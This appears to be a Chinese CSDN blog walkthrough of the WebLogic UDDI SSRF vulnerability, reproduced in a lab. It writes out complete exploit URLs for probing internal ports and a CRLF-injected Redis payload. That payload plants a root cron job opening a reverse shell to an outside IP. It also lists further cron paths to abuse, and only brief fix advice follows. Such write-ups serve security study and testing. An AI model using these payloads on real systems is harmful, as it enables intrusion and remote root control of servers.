linux weblogic ssrf漏洞,Weblogic SSRF漏洞

最新推荐文章于 2023-03-20 11:00:32 发布
最新推荐文章于 2023-03-20 11:00:32 发布
阅读量185 收藏
点赞数
本文详细介绍了WebLogic服务器存在的SSRF漏洞,利用该漏洞可以对内网服务如Redis进行攻击,甚至反弹shell。文章提供了受影响的版本、漏洞复现步骤、内网探测方法以及修复建议,同时提到了利用内网Redis服务反弹shell的详细过程,包括构造的Redis命令和URL编码技巧。
摘要由CSDN通过智能技术生成

摘要

weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

0x01 简介

weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

0x02 影响版本

weblogic 10.0.2 – 10.3.6版本

0x03漏洞环境

启动:

docker-compose up -d

1

docker-composeup-d

0x04漏洞复现

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234

1

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234

052895232c8f70b71225c99ece3b9c0c.gif

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

1

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

052895232c8f70b71225c99ece3b9c0c.gif

探测到存在端口提示404错误

0x05探测内网,利用redis反弹shell

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.3:6379

1

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.3:6379

052895232c8f70b71225c99ece3b9c0c.gif

052895232c8f70b71225c99ece3b9c0c.gif

发送三条redis命令,将弹shell脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/公网ip/port 0>&1\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

1

2

3

4

set1"\n\n\n\n* * * * * root bash -i >& /dev/tcp/公网ip/port 0>&1\n\n\n\n"

configsetdir/etc/

configsetdbfilenamecrontab

save

进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F210%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

1

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F210%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F106.53.91.134%2F6666%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

1

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F106.53.91.134%2F6666%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

052895232c8f70b71225c99ece3b9c0c.gif

0x06反弹shell

052895232c8f70b71225c99ece3b9c0c.gif

052895232c8f70b71225c99ece3b9c0c.gif

0x07修复建议

1.如果业务不需要UDDI功能,就关闭这个功能。可以删除uddiexporer文件夹,可以可在/web在/weblogicPath/server/lib/uddiexplorer.war解压后,注释掉上面的jsp再打包。

0x08补充:

最后补充一下,可进行利用的cron有如下几个地方:

/etc/crontab 这个是肯定的

/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。

/var/spool/cron/root centos系统下root用户的cron文件

/var/spool/cron/crontabs/root debian系统下root用户的cron文件

0x09批量检测工具

下载地址:

052895232c8f70b71225c99ece3b9c0c.gif

六条叔叔
关注
SSRF漏洞内网渗透利用(实例)
墨痕诉清风的博客
10-07 6334
目录 常出现的位置 绕过方式 正则过滤指定网址 内网IP地址绕过(不容许172、10、192开头的地址均不许输入) 常见的攻击协议 实例:ssrf漏洞利用(内网探测、打redis) 一、进行内网探测 二、file协议读取文件 三、攻击redis 方法一:通过header CRLF 注入 方法二:通过【curl命令】和【gopher协议】远程攻击内网redis 方法三:使用dict协议向Redis数据库写shell Payload 完善修改 四、结合gopher协...
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
weixin_35678674的博客
02-22 1150
摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http、file、gopher、dict协议。file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描、端口探测,如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务(一般开放了这个端口的是redis服务),原理是利用他们以目标机的身份执行对开启redis服务的内网机执...
linux下“weblogic挖矿漏洞”发现与解决
HD243608836的博客
12-30 2075
********************************************************************** *1.*//查看所有进程号(PID)/进程名,查看是否有异常进程与异常外网IP访问 ********************************************************************** [root@cartoon
weblogicssrf漏洞修复_weblogic漏洞系列-SSRF漏洞
weixin_30923011的博客
12-31 257
0x01前言:SSRF漏洞的原理这里就不在细说了,这里主要讲解weblogicSSRF漏洞的检测办法,以及利用手段。0x02检测漏洞:image.png2.2、向服务器提交以下参数?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&bt...
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2311
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
weblogic ssrf漏洞复现】
最新发布
m0_71635484的博客
03-20 293
weblogic ssrf漏洞复现】
Weblogic SSRF漏洞复现
K_ShenH的博客
06-24 1100
Weblogic SSRF漏洞
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 3774
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
Weblogic SSRF漏洞(CVE-2014-4210)
墨鱼菜鸡
05-03 114
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:...
Weblogic SSRF漏洞
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
Linux环境下Weblogic SSRF漏洞修复
哎呦喂
03-19 3683
方法一:以修复的直接方法是将SearchPublicRegistries.jsp直接删除就好了;方法二:1.删除uddiexplorer文件夹2.限制uddiexplorer应用只能内网访问方法三:(常用)Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的Se...
LinuxWebLogic漏洞补丁包安装过程
风雨的博客
04-02 3038
官网下载补丁包 找到漏洞对应的补丁包,地址: https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html 找到对应补丁包之后进入补丁包页面,点击如图绿框,进入到补丁包版本对应页面,选择自己的weblogic版本,进行下载。 下载后的安装过程 参照readme 我下...
Redis教程(三)Redis密码设置与无密码攻击
weixin_42073629的博客
05-22 1625
通过Redis客户端连接服务与进行操作默认是不需要密码的,任何人只要连上了服务器那么就可以操作Redis里的数据,而且还可以利用confit set来在线修改redis的配置实现攻击。所以对于暴露在公网中的Redis服务器,我们不光要设置密码,还要设置一个足够复杂的密码才可以,因为Redis的连接速度非常快,官方文档中介绍是每秒可以进行150k次破解。设置密码后客户端连接上Redis进行任何操作都需要验证后才可进行。 下面是给Redis服务设置密码的方法: 方法1:修改redis.conf配置文件以下选
常见中间件漏洞总结
爱上卿的博客
01-25 1万+
1. Weblogic常见漏洞 2. Tomcat常见漏洞 3. Nginx常见漏洞 4. JBOSS常见漏洞 中间件简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种 软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统 之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统 的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之 间仍能交...
利用Redis漏洞远程向服务器写入定时任务
kouryoushine的博客
02-25 5776
由于近期阿里云服务器报警redis漏洞,经过调查对黑客的入侵过程进行了整理并模拟一遍,庆幸此次黑客行为未对公司造成影响,同时还让我学习了很多知识,这里分享给大家。 1,被入侵的前提条件 redis没有设置密码 。 redis配置文件没有打开保护模式,并且没有bindIP地址 。 安全组设置打开了redis的6379端口。 以root用户启动redis。 有人可能会问,怎么可能这么傻,连个密码都不...
网络安全-SSRF漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
【研究】weblogic漏洞系列-SSRF漏洞
god_Zeo的安全博客
08-15 572
【研究】weblogic漏洞系列-SSRF漏洞1.环境2.原理3.影响版本4.利用过程注入HTTP头,利用Redis反弹shell 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求...
Weblogic SSRF漏洞利用
Zane·S的博客
05-25 979
漏洞产生原因: 是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。 攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息, 所以SSRF的一大利用是探测内网端口开放信息。(所以SSRF归类为信息泄漏类型) 漏洞利用: 1.1、直接访问:http://ip...
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值